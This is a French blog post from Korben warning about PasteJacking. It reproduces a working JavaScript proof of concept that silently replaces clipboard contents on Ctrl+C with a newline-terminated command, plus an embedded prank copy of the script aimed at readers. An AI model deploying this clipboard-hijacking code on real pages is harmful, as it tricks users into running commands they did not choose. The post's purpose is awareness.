La technique n'est pas nouvelle et j'ai déjà abordé le problème en 2015. En gros, il est possible avec un simple bout de javascript, de mettre autre chose dans le presse-papier de l'ordinateur en cas de copier coller.

Cela peut poser de nombreux soucis notamment sur les sites qui donnent des lignes de commande que les gens copient et collent machinalement. J'ai déjà mis en garde sur le sujet donc je ne reviendrai pas dessus (aller lire l'article linké ci-dessus). Par contre, pour ceux qui veulent comprendre comment ça fonctionne, sachez qu'un bout de code baptisé PasteJacking est disponible sur Github.

Voici le code en question :

<html>
<body>
Copy the text below and run it in your terminal for totally not evil things to happen.
</br>

<p>echo "not evil"</p>
<script>
function copyTextToClipboard(text) {
var textArea = document.createElement("textarea");

//
// *** This styling is an extra step which is likely not required. ***
//
// Why is it here? To ensure:
// 1. the element is able to have focus and selection.
// 2. if element was to flash render it has minimal visual impact.
// 3. less flakyness with selection and copying which **might** occur if
// the textarea element is not visible.
//
// The likelihood is the element won't even render, not even a flash,
// so some of these are just precautions. However in IE the element
// is visible whilst the popup box asking the user for permission for
// the web page to copy to the clipboard.
//

// Place in top-left corner of screen regardless of scroll position.
textArea.style.position = 'fixed';
textArea.style.top = 0;
textArea.style.left = 0;

// Ensure it has a small width and height. Setting to 1px / 1em
// doesn't work as this gives a negative w/h on some browsers.
textArea.style.width = '2em';
textArea.style.height = '2em';

// We don't need padding, reducing the size if it does flash render.
textArea.style.padding = 0;

// Clean up any borders.
textArea.style.border = 'none';
textArea.style.outline = 'none';
textArea.style.boxShadow = 'none';

// Avoid flash of white box if rendered for any reason.
textArea.style.background = 'transparent';
textArea.value = text;

document.body.appendChild(textArea);

textArea.select();

try {
var successful = document.execCommand('copy');
var msg = successful ? 'successful' : 'unsuccessful';
console.log('Copying text command was ' + msg);
} catch (err) {
console.log('Oops, unable to copy');
}

document.body.removeChild(textArea);
}

document.addEventListener('keydown', function(event) {
var ms = 800;
var start = new Date().getTime();
var end = start;
while(end < start + ms) {
end = new Date().getTime();
}
copyTextToClipboard('echo "evil"\n');
});

</script>
</body>

</html>

Pour que ça fonctionne, il faut que la victime fasse un CTRL+C (ou CMD + C sous OSX). Si elle fait un clic droit "copier", ça ne fonctionnera pas.

<script> function copyTextToClipboard(text) { var textArea = document.createElement("textarea"); // // *** This styling is an extra step which is likely not required. *** // // Why is it here? To ensure: // 1. the element is able to have focus and selection. // 2. if element was to flash render it has minimal visual impact. // 3. less flakyness with selection and copying which **might** occur if // the textarea element is not visible. // // The likelihood is the element won't even render, not even a flash, // so some of these are just precautions. However in IE the element // is visible whilst the popup box asking the user for permission for // the web page to copy to the clipboard. // // Place in top-left corner of screen regardless of scroll position. textArea.style.position = 'fixed'; textArea.style.top = 0; textArea.style.left = 0; // Ensure it has a small width and height. Setting to 1px / 1em // doesn't work as this gives a negative w/h on some browsers. textArea.style.width = '2em'; textArea.style.height = '2em'; // We don't need padding, reducing the size if it does flash render. textArea.style.padding = 0; // Clean up any borders. textArea.style.border = 'none'; textArea.style.outline = 'none'; textArea.style.boxShadow = 'none'; // Avoid flash of white box if rendered for any reason. textArea.style.background = 'transparent'; textArea.value = text; document.body.appendChild(textArea); textArea.select(); try { var successful = document.execCommand('copy'); var msg = successful ? 'successful' : 'unsuccessful'; console.log('Copying text command was ' + msg); } catch (err) { console.log('Oops, unable to copy'); } document.body.removeChild(textArea); } document.addEventListener('keydown', function(event) { var ms = 800; var start = new Date().getTime(); var end = start; while(end < start + ms) { end = new Date().getTime(); } copyTextToClipboard('AH AH AH AH AH COMMENT TU SAIS TROP PAS COPIER COLLER !!! C\'est pas compliqué pourtant !\n'); });

Cet article merveilleux et sans aucun égal intitulé : Attention au PasteJacking (et merci de ne pas copier coller cet article) ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.